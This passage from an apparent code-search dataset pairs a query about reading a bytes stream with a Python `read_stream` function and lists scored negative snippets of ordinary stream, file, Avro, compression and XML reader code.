docFormat\n exit(2)\n\n # Ensure that the output directory exists\n if not exists(outputDir):\n print \"ERROR: the output directory does not exist: %s\" % outputDir\n exit(3)\n\n # Make sure the ROS master is running\n try:\n rosgraph.Master('/rostopic').getPid()\n except socket.error:\n print \"ERROR: failed to communicate with the ROS master!\"\n exit(4)\n\n # Create the ROS master proxy node\n masterProxy = RosMasterProxy(nodeNames, port=proxyPort)\n\n try:\n print \"Starting server...\"\n masterProxy.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n\n # Document the information about the node\n print \"Documenting...\"\n masterProxy.document(outputDir, docFormat=docFormat)", "def _print_doc(self, name):\r\n print(self._get_doc(name)) # noqa\r", "def get_doc_string(self) -> str:\n r = \"Undocumented\"\n if self.doc is not None: r = self.doc\n return r", "def Standalone(self):\n ret = libxml2mod.xmlTextReaderStandalone(self._o)\n return ret", "def doc(obj):\n return Documentation.fromObject(obj).first", "def help(*args):\n console_script = ConsoleScript.singleton\n\n if not args:\n # show documentation for parsed group\n yield console_script.parser.group.doc\n else:\n # show command documentation if possible\n if args[0] in console_script:\n yield console_script[args[0]].doc\n else:\n importable = Importable.factory(args[0])\n if importable.target and not importable.is_module:\n yield importable.doc\n elif importable.module:\n if not importable.target:\n yield f'{RED}Cannot import {args[0]}{RESET}'\n yield ' '.join([\n YELLOW,\n 'Showing help for',\n importable.module.__name__ + RESET\n ])\n yield BaseGroup.factory(importable.module.__name__).doc", "def do_docs(self, path):\n print(\"scaraping documentation\")\n for p in path.glob(\"**/*\"):\n if p.is_file():\n parts = p.relative_to(path).parts\n if parts[-1].endswith(\"rst\"):\n data = tsparse(p.read_bytes())\n blob = DocBlob()\n blob.arbitrary = data\n blob.content = {}\n\n blob.ordered_sections = []\n blob.item_file = None\n blob.item_line = None\n blob.item_type = None\n blob.aliases = []\n blob.example_section_data = Section()\n blob.see_also = []\n blob.signature = None\n blob.references = None\n blob.refs = []\n\n self.docs[parts] = json.dumps(blob.to_json(), indent=2)\n else:\n pass\n # data = p.read_bytes()" ]
[ "0.6139211", "0.5529351", "0.5529351", "0.5529351", "0.5385095", "0.53439957", "0.52958757", "0.5215697", "0.5117727", "0.49581614", "0.48913068", "0.4863882", "0.48443574", "0.48011702", "0.47767526", "0.47586027", "0.47446275", "0.4685375", "0.46740708", "0.4643249", "0.46230683", "0.46218795", "0.46174067", "0.4599343", "0.45940423", "0.4585905", "0.4578101", "0.45744273", "0.45646197", "0.45554435", "0.45423672", "0.45349377", "0.45341086", "0.45293927", "0.45215365", "0.45209196", "0.451842", "0.4505307", "0.45045516", "0.4487047", "0.44858012", "0.44592923", "0.4457363", "0.4453356", "0.44464195", "0.44438043", "0.44219062", "0.44148767", "0.44121125", "0.44120452", "0.43969417", "0.43968582", "0.43968582", "0.43878096", "0.43817967", "0.43715546", "0.43703216", "0.43620768", "0.4314396", "0.43136477", "0.4299846", "0.42991078", "0.42959926", "0.42930102", "0.42911634", "0.42860177", "0.42856792", "0.42797607", "0.42753145", "0.42720574", "0.42715117", "0.4255769", "0.4254046", "0.42538038", "0.42492002", "0.42488486", "0.4247641", "0.4247497", "0.42330313", "0.4229222", "0.42289084", "0.4228169", "0.4220502", "0.42165104", "0.42122507", "0.4209693", "0.42052147", "0.42002892", "0.4197405", "0.41942662", "0.41941658", "0.4188567", "0.41831222", "0.41626266", "0.4161027", "0.4159943", "0.4158329", "0.415762", "0.41520885", "0.41490442" ]
0.67184293
0
Read a bytes stream with a given reader If the reader is not specified, an attempt to guess at an appropriate reader is made. A NoReaderFound error is raised if no such appropriate reader is found.
def read_stream( input_stream: IO[bytes], reader_name: Optional[str] = None, **reader_args: Any ) -> Reader: if reader_name is None: reader_name = identify(input_stream) reader = plugins.call( package_name=__name__, plugin_name=reader_name, input_stream=input_stream, **reader_args, ) reader.read() return reader
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def read_file(\n file_path: Union[str, pathlib.Path],\n reader_name: Optional[str] = None,\n **reader_args: Any,\n) -> Reader:\n with open(file_path, mode=\"rb\") as input_stream:\n return read_stream(input_stream, reader_name)", "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def read_bytes(stream, writer_schema=None, reader_schema=None): # noqa\n size = read_long(stream)\n if reader_schema == 'string':\n # Schema Resolution: promote to unicode string\n return stream.read(size).decode('utf-8')\n else:\n return stream.read(size)", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def reader_for_streaming(io):\n if not hasattr(io, 'read'):\n raise TypeError('{0} must be an opened file.'.format(io))\n if hasattr(io, 'encoding'):\n raise TypeError('{0} must be opened in binary mode'.format(io))\n return reader.Reader.read_headers(io)", "def read(self, source, sourcename=None, postcheck=True, strict=True):\n if isinstance(source, str):\n with open(source, mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or source,\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, pathlib.Path):\n with source.open(mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or str(source),\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, io.BufferedIOBase):\n return self.readTextStream(\n io.TextIOWrapper(source),\n sourcename,\n postcheck=postcheck,\n strict=strict,\n )\n elif not isinstance(source, io.TextIOBase):\n raise TypeError(\n \"Source must be file name (str or pathlib.Path) or \"\n \"readable stream of text data. Got {}\".format(type(source))\n )\n return self.readTextStream(\n source, sourcename, postcheck=postcheck, strict=strict\n )", "def schemaless_reader(stream, schema):\n acquaint_schema(schema)\n return read_data(stream, schema)", "async def readuntil_or_exc(reader, separator = b'\\n', timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.readuntil(separator), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def get_stream_reader(fh, tmp_dir):\n magic_dict = {\n b\"\\x1f\\x8b\\x08\": _get_stream_readers_for_gzip,\n b\"\\x42\\x5a\\x68\": _get_stream_readers_for_bz2,\n b\"\\x50\\x4b\\x03\\x04\": _get_stream_readers_for_zip,\n }\n start_of_file = fh.read(CHUNK_SIZE)\n try:\n fh.seek(0)\n except UnsupportedOperation: # This happens if fh has been created by urlopen\n fh = _download_file(start_of_file, fh)\n try: # Check if file is tar file\n if tarfile.open(fileobj=StringIO(start_of_file)):\n return _get_stream_readers_for_tar(fh, tmp_dir)\n except tarfile.ReadError:\n pass\n for k, v in magic_dict.items():\n if start_of_file.startswith(k):\n return v(fh, tmp_dir)\n return [fh]", "def _ReadStream(self, stream_name):\n file_object = self._OpenStream(stream_name)\n if not file_object:\n return b''\n\n try:\n data = file_object.read()\n finally:\n file_object.close()\n\n return data", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def read(ios):\n assert(isinstance(ios, io.IOBase))\n return Reader(ios).read()", "def do_read(fp, decoder):\r\n # read header\r\n header = fp.read(RecordIO.RECORD_HEADER_SIZE)\r\n if len(header) == 0:\r\n log.debug(\"%s has no data (current offset = %d)\" % (fp.name, fp.tell()))\r\n # Reset EOF (appears to be only necessary on OS X)\r\n fp.seek(fp.tell())\r\n return None\r\n elif len(header) != RecordIO.RECORD_HEADER_SIZE:\r\n raise RecordIO.PrematureEndOfStream(\r\n \"Expected %d bytes in header, got %d\" % (RecordIO.RECORD_HEADER_SIZE, len(header)))\r\n blob_len = struct.unpack('>L', header)[0]\r\n if blob_len > RecordIO.MAXIMUM_RECORD_SIZE:\r\n raise RecordIO.RecordSizeExceeded(\"Record exceeds maximum allowable size\")\r\n\r\n # read frame\r\n read_blob = fp.read(blob_len)\r\n if len(read_blob) != blob_len:\r\n raise RecordIO.PrematureEndOfStream(\r\n 'Expected %d bytes in frame, got %d' % (blob_len, len(read_blob)))\r\n return decoder.decode(read_blob)", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "async def read_stream(self, stream_read_request_body: StreamReadRequestBody = Body(None, description=\"\")) -> StreamRead:\n adapter = self._create_low_code_adapter(manifest=stream_read_request_body.manifest)\n schema_inferrer = SchemaInferrer()\n\n if stream_read_request_body.record_limit is None:\n record_limit = self.max_record_limit\n else:\n record_limit = min(stream_read_request_body.record_limit, self.max_record_limit)\n\n slices = []\n log_messages = []\n try:\n for message_group in self._get_message_groups(\n adapter.read_stream(stream_read_request_body.stream, stream_read_request_body.config),\n schema_inferrer,\n record_limit,\n ):\n if isinstance(message_group, AirbyteLogMessage):\n log_messages.append({\"message\": message_group.message})\n else:\n slices.append(message_group)\n except Exception as error:\n # TODO: We're temporarily using FastAPI's default exception model. Ideally we should use exceptions defined in the OpenAPI spec\n self.logger.error(f\"Could not perform read with with error: {error.args[0]} - {self._get_stacktrace_as_string(error)}\")\n raise HTTPException(\n status_code=400,\n detail=f\"Could not perform read with with error: {error.args[0]}\",\n )\n\n return StreamRead(\n logs=log_messages,\n slices=slices,\n test_read_limit_reached=self._has_reached_limit(slices),\n inferred_schema=schema_inferrer.get_stream_schema(stream_read_request_body.stream)\n )", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def read_data(stream, writer_schema, reader_schema=None):\n if isinstance(writer_schema, dict):\n record_type = writer_schema['type']\n elif isinstance(writer_schema, list):\n record_type = 'union'\n else:\n record_type = writer_schema\n\n if reader_schema and record_type in AVRO_TYPES:\n if not match_schemas(writer_schema, reader_schema):\n raise SchemaResolutionError(\n 'Schema mismatch: %s does not match %s'\n % (writer_schema, reader_schema)\n )\n\n try:\n return READERS[record_type](stream, writer_schema, reader_schema)\n except SchemaResolutionError:\n raise\n except Exception as exc:\n raise ReadError(\n 'Failed to read %r type' % record_type, exc\n )", "def read_string(stream, writer_schema=None, reader_schema=None): # noqa\n size = read_long(stream)\n if reader_schema == 'bytes':\n # Schema Resolution: promote to byte string\n return stream.read(size)\n else:\n return stream.read(size).decode('utf-8')", "def checked_read(in_stream, length, allow_eof=False):\n\n bytes = in_stream.read(length)\n if allow_eof and bytes == '':\n return bytes\n if len(bytes) != length:\n raise IOError(MSG_INCOMPLETE_READ)\n return bytes", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def read_stream(schema, stream, *, buffer_size=io.DEFAULT_BUFFER_SIZE):\n reader = _lancaster.Reader(schema)\n buf = stream.read(buffer_size)\n remainder = b''\n while len(buf) > 0:\n values, n = reader.read_seq(buf)\n yield from values\n remainder = buf[n:]\n buf = stream.read(buffer_size)\n if len(buf) > 0 and len(remainder) > 0:\n ba = bytearray()\n ba.extend(remainder)\n ba.extend(buf)\n buf = memoryview(ba).tobytes()\n if len(remainder) > 0:\n raise EOFError('{} bytes remaining but could not continue reading '\n 'from stream'.format(len(remainder)))", "def try_read(self):\r\n pos = self._fp.tell()\r\n try:\r\n return self.read()\r\n except RecordIO.PrematureEndOfStream as e:\r\n log.debug('Got premature end of stream [%s], skipping - %s' % (self._fp.name, e))\r\n self._fp.seek(pos)\r\n return None", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def read_fixed(stream, writer_schema, reader_schema=None):\n return stream.read(writer_schema['size'])", "def read(reader: BitStreamReader, _index: int) -> BitBuffer:\n\n return reader.readBitBuffer()", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def read(self, *args, **kwargs):\n return self.limitedstream.read(*args, **kwargs)", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def read(self) -> Optional[bytes]:", "def read_on(reader, f):\n while True:\n try:\n line = reader(f)\n except StopIteration:\n break\n\n if line is not None:\n yield line", "async def read(self, *, decode: bool = ...) -> bytes:\n ...", "def readline(self) -> Optional[bytes]:\n ...", "def load_reader(path):\n if path[-4:] != '.pkl':\n path+='.pkl'\n with open(path,\"r+b\") as f:\n log(\"Loading reader from {}\".format(path))\n r = pickle.load(f)\n return r", "def Read(buf: IO[bytes]) -> Optional[bytes]:\n count_bytes = buf.read(_UINT64.size)\n if not count_bytes:\n return None\n\n try:\n (count,) = _UINT64.unpack(count_bytes)\n except struct.error as error:\n raise ValueError(f\"Incorrect size tag {count_bytes}: {error}\")\n\n # It might happen that we are given file with incorrect format. If the size\n # tag is interpreted as a huge number, reading the buffer will lead to raising\n # an exception, because Python will try to allocate a buffer to read into. If\n # possible, we try to check guard against such situations and provide more\n # informative exception message.\n\n def Error(left: int) -> ValueError:\n message = f\"Malformed input (reading {count} bytes out of {left} available)\"\n return ValueError(message)\n\n if buf.seekable():\n position = buf.tell()\n\n buf.seek(0, os.SEEK_END)\n size = buf.tell()\n\n if count > size - position:\n raise Error(size - position)\n\n buf.seek(position, os.SEEK_SET)\n\n chunk = buf.read(count)\n if len(chunk) != count:\n raise Error(len(chunk))\n\n return chunk", "def Deserializer(stream_or_string, **options):\n if not isinstance(stream_or_string, (bytes, str)):\n stream_or_string = stream_or_string.read()\n if isinstance(stream_or_string, bytes):\n stream_or_string = stream_or_string.decode()\n try:\n objects = json.loads(stream_or_string)\n yield from PythonDeserializer(objects, **options)\n except (GeneratorExit, DeserializationError):\n raise\n except Exception as exc:\n raise DeserializationError() from exc", "def read(self, nbytes: int, /) -> Optional[bytes]:", "def prep_stream_data(data):\n if isinstance(data, (six.string_types, six.binary_type)):\n stream = io.BytesIO(to_bytes(data))\n else:\n stream = data\n\n return InsistentReaderBytesIO(stream)", "def _get_part_reader(self, headers: CIMultiDictProxy[str]) -> Union[MultipartReader, BodyPartReader]:\n ...", "def read(self, nbytes: Optional[int] = None) -> Optional[bytes]:\n ...", "def read_null(stream, writer_schema=None, reader_schema=None):\n return None", "def _get_infile(filepath):\n # type: (Text) -> BinaryIO\n if filepath is None:\n return sys.stdin\n else:\n if not os.path.exists(filepath):\n raise OSError('File does not exist: {}'.format(filepath))\n return open(filepath, 'r')", "def _read_binary(self, filename):\n\t\ttry:\n\t\t\tvalidation.required(filename, 'filename')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t@stack\n\t\tdef do_read(file):\n\t\t\tif os.path.exists(file):\n\t\t\t\tf = open(file, \"rb\")\n\t\t\t\tdata = f.read()\n\t\t\t\tf.close()\n\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\traise errors.APIError(\"File not found: %s\" % file)\n\n\t\td = Deferred()\n\t\td.addCallback(do_read)\n\t\td.addCallback(lambda _: (0, _))\n\t\td.addErrback(lambda _: (-1, _.getErrorMessage()))\n\t\td.callback(filename)\n\t\treturn d", "async def readexactly_or_exc(reader, n, timeout = None):\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.readexactly(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def readfile(input_stream, offset, size):\n input_stream.seek(offset)\n dest = input_stream.read(size)\n if dest:\n return dest", "def test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def test_getreader(self):\n reader = codecs.getreader('imap4-utf-7')(BytesIO(b'Hello&AP8-world'))\n self.assertEqual(reader.read(), u'Hello\\xffworld')", "def _ReadSerializerStream(self):\n stream_name = 'serializer.txt'\n if not self._HasStream(stream_name):\n return\n\n serialization_format = self._ReadStream(stream_name)\n if serialization_format != definitions.SERIALIZER_FORMAT_JSON:\n raise ValueError(\n 'Unsupported stored serialization format: {0:s}'.format(\n serialization_format))\n\n return serialization_format", "def test_bio_read_wrong_args(self, bufsize):\n ctx = Context(SSLv23_METHOD)\n conn = Connection(ctx, None)\n with pytest.raises(TypeError):\n conn.bio_read(bufsize)", "def open_input_stream(uri: str) -> BinaryIO:\n parsed = urlparse(uri)\n if parsed.scheme == \"gs\":\n return _gcsfs().open(uri)\n else:\n filesystem, path = fs.FileSystem.from_uri(uri)\n return filesystem.open_input_file(path)", "def read(self, reader: BitStreamReader, index: int) -> typing.Any:\n\n return self._objectCreator(reader, index)", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def _read(self):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n try:\n with self._read_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n data = self._reader.readline(self.MAX_MESSAGE_SIZE)\n # If there weren't a \"\\r\\n\" between the last message\n # and the EOF we would have a false positive here.\n # Luckily there is one.\n if len(data) > 0 and not data.endswith(b\"\\r\\n\"):\n logger.error(\n \"The client sent a message larger than %d bytes (that \"\n \"is MAX_MESSAGE_SIZE). Consider raising that value if \"\n \"the message seemed legit.\", self.MAX_MESSAGE_SIZE)\n self.finalize(\"Client misbehaving.\")\n raise IOError(\"Message too long.\")\n except socket.error as error:\n if self.connected:\n logger.warning(\"Failed reading from socket: %s.\", error)\n self.finalize(\"Read failed.\")\n raise error\n else:\n # The client was terminated willingly; its correct termination\n # is handled in disconnect(), so here we can just return.\n return b\"\"\n\n return data", "def _convert_to_fd_or_read_function(fd):\n if is_callable(fd):\n yield fd\n return\n elif isinstance(fd, basestring):\n if fd.endswith('.gz'):\n from ...utils.compat import gzip\n with gzip.GzipFile(fd, 'rb') as real_fd:\n yield real_fd.read\n return\n else:\n with open(fd, 'rb') as real_fd:\n if sys.platform.startswith('win'):\n # On Windows, we can't pass a real file descriptor\n # to the C level, so we pass the read method\n yield real_fd.read\n return\n yield real_fd\n return\n elif hasattr(fd, 'read'):\n assert is_callable(fd.read)\n magic = fd.read(2)\n fd.seek(0)\n if magic == b'\\x1f\\x8b':\n from ...utils.compat import gzip\n fd = gzip.GzipFile(fileobj=fd)\n\n if type(fd.read(0)) == type(u''):\n def make_encoder(reader):\n def read(n):\n return reader(n).encode('utf-8')\n yield make_encoder(fd.read)\n return\n\n if not sys.platform.startswith('win'):\n if IS_PY3K:\n if isinstance(fd, io.FileIO):\n yield fd\n return\n else:\n if isinstance(fd, file):\n yield fd\n return\n\n yield fd.read\n return\n else:\n raise TypeError(\"Can not be coerced to read function\")", "def chunked_reader(name):\n with open(name, \"rb\") as src:\n for chunk in iter(lambda: src.read(4096), b\"\"):\n yield chunk", "def bz2_file_bytes_reader(path):\n return bz2.open(path, 'rb')", "def partial_reader(filename, chunk_size):\n try:\n file = open(filename, 'rb')\n while True:\n chunk = file.read(chunk_size)\n if not chunk:\n return\n yield chunk\n except IOError as e:\n logger.error(\"IOError: %s\" %(str(e)), exc_info=True)\n return", "def unwrap_read(b):\n if not b:\n raise ConnectionResetError(ECONNRESET, os.strerror(ECONNRESET))\n return b", "def _read(fp, offset, size):\n fp.seek(offset)\n return fp.read(size)", "def read(num_bytes):\n # If file cannot be mmap'd (e.g. is stdin, or a fifo), fall back\n # to doing an actual read from the file.\n if not can_be_mmapd(fd):\n return fd.read(num_bytes)\n\n bytes_available = max(file_size - offset, 0)\n if bytes_available == 0:\n return b\"\"\n\n return mmap.mmap(fd.fileno(), min(num_bytes, bytes_available), offset=offset, access=mmap.ACCESS_READ)", "def read_union(stream, writer_schema, reader_schema=None):\n index = read_long(stream)\n w_schema = writer_schema[index]\n if reader_schema:\n # Schema Resolution\n r_schemas = (reader_schema if isinstance(reader_schema, list)\n else (reader_schema,))\n for r_schema in r_schemas:\n if match_schemas(w_schema, r_schema):\n return read_data(stream, w_schema, r_schema)\n raise SchemaResolutionError(\n 'Schema mismatch: %s cannot resolve to %s'\n % (writer_schema, reader_schema)\n )\n else:\n return read_data(stream, w_schema)", "def read_blob(blob):\r\n if blob.hexsha != Diff.NULL_HEX_SHA:\r\n return blob.data_stream.read()\r\n else:\r\n with open(blob.path) as fp:\r\n return fp.read()", "def _open_bytesio(stream, *args, **kwargs): # pylint: disable=unused-argument\n yield stream", "def read_record(stream, writer_schema, reader_schema=None):\n record = {}\n if reader_schema is None:\n for field in writer_schema['fields']:\n record[field['name']] = read_data(stream, field['type'])\n else:\n readers_field_dict = dict(\n (f['name'], f) for f in reader_schema['fields']\n )\n for field in writer_schema['fields']:\n readers_field = readers_field_dict.get(field['name'])\n if readers_field:\n record[field['name']] = read_data(\n stream, field['type'], readers_field['type']\n )\n else:\n # should implement skip\n read_data(stream, field['type'], field['type'])\n\n # fill in default values\n if len(readers_field_dict) > len(record):\n writer_fields = set(f['name'] for f in writer_schema['fields'])\n for field_name, field in iteritems(readers_field_dict):\n if field_name not in writer_fields:\n if 'default' in field:\n record[field['name']] = field['default']\n else:\n msg = 'No default value for %s' % field['name']\n raise SchemaResolutionError(msg)\n return record", "def read(self, reader: BitStreamReader, size: int = 0) -> None:\n\n self._rawArray.clear()\n\n if self._isImplicit:\n if not self._arrayTraits.HAS_BITSIZEOF_CONSTANT:\n raise PythonRuntimeException(\"Array: Implicit array elements must have constant bit size!\")\n\n elementSize = self._arrayTraits.bitSizeOf()\n remainingBits = reader.getBufferBitSize() - reader.getBitPosition()\n readSize = remainingBits // elementSize\n for index in range(readSize):\n self._rawArray.append(self._arrayTraits.read(reader, index))\n else:\n if self._isAuto:\n readSize = reader.readVarSize()\n else:\n readSize = size\n\n for index in range(readSize):\n if self._checkOffsetMethod is not None:\n reader.alignTo(8)\n self._checkOffsetMethod(index, reader.getBitPosition())\n self._rawArray.append(self._arrayTraits.read(reader, index))", "def readFromStream(self, streamBuf):\n consumedBytes = 0\n\n try:\n while self.bytesToRead > 0 and len(streamBuf[consumedBytes:]) >= self.bytesToRead:\n if self.readheader:\n self.readheader = False\n self.type, self.bytesToRead = self.readHeader(streamBuf[:self.headerLength])\n consumedBytes = self.headerLength\n else:\n rawdata = streamBuf[consumedBytes:consumedBytes+self.bytesToRead]\n consumedBytes += self.bytesToRead\n self.bytesToRead = 0\n \n self.data = self.readData(rawdata, self.type)\n \n except BaseException as e:\n import traceback\n log.log(2, \"error reading message from stream %s\" % str(e))\n log.log(2, traceback.format_exc())\n \n return consumedBytes", "def DataReader(name, data_source=None, start=None, end=None,\n retry_count=3, pause=0.001, session=None, access_key=None):\n if data_source == \"yahoo\":\n return YahooDailyReader(symbols=name, start=start, end=end,\n adjust_price=False, chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"yahoo-actions\":\n return YahooActionReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"yahoo-dividends\":\n return YahooDailyReader(symbols=name, start=start, end=end,\n adjust_price=False, chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session, interval='v').read()\n\n elif data_source == \"google\":\n return GoogleDailyReader(symbols=name, start=start, end=end,\n chunksize=25,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"enigma\":\n return EnigmaReader(datapath=name, api_key=access_key).read()\n\n elif data_source == \"fred\":\n return FredReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"famafrench\":\n return FamaFrenchReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n\n elif data_source == \"oecd\":\n return OECDReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"eurostat\":\n return EurostatReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"edgar-index\":\n return EdgarIndexReader(symbols=name, start=start, end=end,\n retry_count=retry_count, pause=pause,\n session=session).read()\n elif data_source == \"oanda\":\n return get_oanda_currency_historical_rates(\n start, end,\n quote_currency=\"USD\", base_currency=name,\n reversed=True, session=session\n )\n elif data_source == 'nasdaq':\n if name != 'symbols':\n raise ValueError(\"Only the string 'symbols' is supported for \"\n \"Nasdaq, not %r\" % (name,))\n return get_nasdaq_symbols(retry_count=retry_count, pause=pause)\n else:\n msg = \"data_source=%r is not implemented\" % data_source\n raise NotImplementedError(msg)", "def readerForMemory(buffer, size, URL, encoding, options):\n ret = libxml2mod.xmlReaderForMemory(buffer, size, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForMemory() failed')\n return xmlTextReader(_obj=ret)", "async def next(self) -> Optional[Union[MultipartReader, BodyPartReader]]:\n ...", "async def next(self) -> Optional[Union[MultipartReader, BodyPartReader]]:\n ...", "def read_data(reader: UFOReader, filename: str) -> bytes:\n return reader.readImage(filename) # type: ignore", "def read(self, size: int = None) -> bytes:\n if size is None:\n buffer = io.BytesIO()\n copy_stream(self, buffer)\n return buffer.getvalue()\n else:\n return self._read_chunked(size)", "def read(self, location, **user_options):\n\n # Base the options off a copy to leave the Reader options uneffected.\n options = self.options.copy()\n options.update(user_options)\n\n # The directory option allows users to specify file locations relative\n # to a location other than the present working directory by joining the\n # location with the directory of their choice.\n if options.directory:\n location = os.path.join(options.directory, location)\n\n # When passed a directory as the location, the Reader recursively builds\n # a list of replays to return using the utils.get_files function. This\n # function respects the following arguments:\n # * depth: The maximum depth to traverse. Defaults to unlimited (-1)\n # * follow_symlinks: Boolean for following symlinks. Defaults to True\n # * exclude_dirs: A list of directory names to skip while recursing\n # * incldue_regex: A regular expression rule which all returned file\n # names must match. Defaults to None\n #\n replays, files = list(), utils.get_files(location, **options)\n\n # If no files are found, it could be for a variety of reasons\n # raise a NoMatchingFilesError to alert them to the situation\n if not files:\n raise exceptions.NoMatchingFilesError()\n\n for location in files:\n if options.verbose: print \"Reading: %s\" % location\n\n with open(location, 'rb') as replay_file:\n replays.append(self.make_replay(replay_file, **options))\n\n return replays", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def load_stream(source):\n raise NotImplementedError(\"not implemented yet\")", "def read(reader: BitStreamReader, _index: int) -> str:\n\n return reader.readString()", "def readerForFd(fd, URL, encoding, options):\n ret = libxml2mod.xmlReaderForFd(fd, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForFd() failed')\n return xmlTextReader(_obj=ret)", "def 